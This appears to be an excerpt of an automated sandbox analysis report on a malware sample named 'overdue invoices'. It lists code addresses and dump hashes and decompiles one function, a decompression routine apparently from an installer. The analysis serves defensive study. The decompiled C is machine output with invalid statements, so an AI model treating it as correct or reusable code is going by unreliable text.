                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x0040640d

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                  • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
